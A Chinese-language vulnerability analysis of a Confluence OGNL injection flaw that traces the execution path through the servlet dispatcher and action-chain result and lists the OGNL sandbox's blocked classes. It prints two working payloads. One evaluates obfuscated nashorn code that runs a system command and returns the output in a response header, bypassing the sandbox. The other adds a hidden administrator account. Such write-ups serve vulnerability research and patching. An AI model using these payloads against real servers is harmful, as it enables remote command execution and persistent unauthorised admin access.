移除了com.opensymphony.xwork.util.TextParseUtil#translateVariables
的调用,跟进这个函数发现这里是ognl表达式执行点。
然后走到com.atlassian.confluence.servlet.ConfluenceServletDispatcher#serviceAction
ConfluenceServletDispatcher是ServletDispatcher的子类
在serviceAction中先调用createActionProxy创建一个代理对象,然后调用代理对象的execute函数,在代理对象中我们的payload保存至namespace字段
然后将自身this传递给interceptor.intercept(this)
,以com.opensymphony.xwork.interceptor.AroundInterceptor
拦截器为例,仍会调用invocation.invoke()
其中notpermitted对应的result类为com.opensymphony.xwork.ActionChainResult
,所以会进入com.opensymphony.xwork.ActionChainResult#execute
v7.15开始,Confluence在OGNL表达式解析时加入了沙箱设置。在com.opensymphony.xwork.util.TextParseUtil#translateVariables
调用ognl时使用findValue
1sun.misc.Unsafe
2classLoader
3java.lang.System
4java.lang.ThreadGroup
5com.opensymphony.xwork.ActionContext java.lang.Compiler
6com.atlassian.applinks.api.ApplicationLinkRequestFactory
7java.lang.Thread
8com.atlassian.core.util.ClassLoaderUtils
9java.lang.ProcessBuilder
10java.lang.InheritableThreadLocal
11com.atlassian.core.util.ClassHelper
12class
13java.lang.Shutdown
14java.lang.ThreadLocal
15java.lang.Process
16java.lang.Package
17org.apache.tomcat.InstanceManager
18java.lang.Runtime
19javax.script.ScriptEngineManager
20javax.persistence.EntityManager
21org.springframework.context.ApplicationContext
22java.lang.SecurityManager
23java.lang.Object
24java.lang.Class
25java.lang.RuntimePermission
26javax.servlet.ServletContext
27java.lang.ClassLoader
28java.rmi
29sun.management
30org.apache.catalina.session
31java.jms
32com.atlassian.confluence.util.io
33com.google.common.reflect
34javax.sql
35java.nio
36com.atlassian.sal.api.net
37sun.invoke
38java.util.zip
39liquibase
40com.hazelcast
41org.apache.commons.httpclient
42com.atlassian.util.concurrent
43java.net
44freemarker.ext.jsp
45com.sun.jna
46net.java.ao
47javax
48sun.corba
49org.springframework.util.concurrent
50com.sun.jmx
51sun.misc
52javassist
53ognl
54org.apache.commons.exec
55com.atlassian.cache
56org.wildfly.extension.undertow.deployment java.lang.reflect
57io.atlassian.util.concurrent
58java.util.concurrent
59com.atlassian.confluence.util.http
60sun.tracing
61org.objectweb.asm
62freemarker.template
63net.sf.hibernate
64freemarker.core
65net.bytebuddy
66org.apache.tomcat
67freemarker.ext.rhino
68com.atlassian.media
69org.springframework.context
70org.apache.velocity
71javax.xml
72java.sql
73sun.reflect
74sun.net
75javax.persistence
76org.javassist
77javax.naming
78org.apache.httpcomponents.httpclient
79com.atlassian.hibernate
80sun.nio
81com.atlassian.confluence.impl.util.sandbox
82com.google.common.net
83com.atlassian.filestore
84org.apache.commons.io
85com.atlassian.vcache
86jdk.nashorn
87sun.launcher
88oshi
89org.apache.bcel
90sun.rmi
91sun.tools.jar
92org.springframework.expression.spel
93com.opensymphony.xwork.util
94org.ow2.asm
95com.atlassian.confluence.setup.bandana
96org.quartz
97net.sf.cglib
98com.atlassian.activeobjects
99com.atlassian.utils.process
100sun.security
101com.atlassian.quartz
102javax.management
103sun.awt.shell
104com.google.common.cache
105org.apache.http.client
106java.io
107com.atlassian.confluence.util.sandbox
108java.util.jar
109com.atlassian.scheduler
110sun.print
111com.atlassian.failurecache
112com.google.common.io
113org.apache.catalina.core
114org.ehcache
115getClass
116getClassLoader
1net.sf.hibernate.proxy.HibernateProxy
2java.lang.reflect.Proxy
3net.java.ao.EntityProxyAccessor
4net.java.ao.RawEntity
5net.sf.cglib.proxy.Factory
6java.io.ObjectInputValidation
7net.java.ao.Entity
8com.atlassian.confluence.util.GeneralUtil
9java.io.Serializable
1${Class.forName("com.opensymphony.webwork.ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("X-CMD",Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode(118,97,114,32,115,61,39,39,59,118,97,114,32,112,112,32,61,32,106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,105,100,39,41,46,103,101,116,73,110,112,117,116,83,116,114,101,97,109,40,41,59,119,104,105,108,101,32,40,49,41,32,123,118,97,114,32,98,32,61,32,112,112,46,114,101,97,100,40,41,59,105,102,32,40,98,32,61,61,32,45,49,41,32,123,98,114,101,97,107,59,125,115,61,115,43,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,98,41,125,59,115))"))}
1redirect com.atlassian.confluence.xwork.RedirectResult
2loginrequired com.atlassian.confluence.xwork.RedirectResult
3notsetup com.atlassian.confluence.xwork.RedirectResult
4notpermittedpersonal com.opensymphony.xwork.ActionChainResult
5forward com.opensymphony.webwork.dispatcher.ServletDispatcherResult
6websudorequired com.atlassian.confluence.xwork.RedirectResult
7atom03 com.atlassian.xwork.results.RssResult
8rss1 com.atlassian.xwork.results.RssResult
9httpmethodnotallowed com.opensymphony.webwork.dispatcher.HttpHeaderResult
10atom10 com.atlassian.xwork.results.RssResult
11licenseexpired com.atlassian.confluence.setup.webwork.EncodingVelocityResult
12rss com.atlassian.xwork.results.RssResult
13readonly com.opensymphony.xwork.ActionChainResult
14notpermitted com.opensymphony.xwork.ActionChainResult
15rss2 com.atlassian.xwork.results.RssResult
16notfound com.opensymphony.xwork.ActionChainResult
17invalidmethod com.opensymphony.webwork.dispatcher.HttpHeaderResult
18licenseusersexceeded com.atlassian.confluence.setup.webwork.EncodingVelocityResult
19alreadysetup com.atlassian.confluence.setup.webwork.EncodingVelocityResult
20pagenotfound com.opensymphony.webwork.dispatcher.ServletDispatcherResult
21atom com.atlassian.xwork.results.RssResult
1${#this.getUserAccessor().addUser('test','test@1234','test@gmail.com','Test',@[email protected]ing("confluence-administrators,confluence-users"))}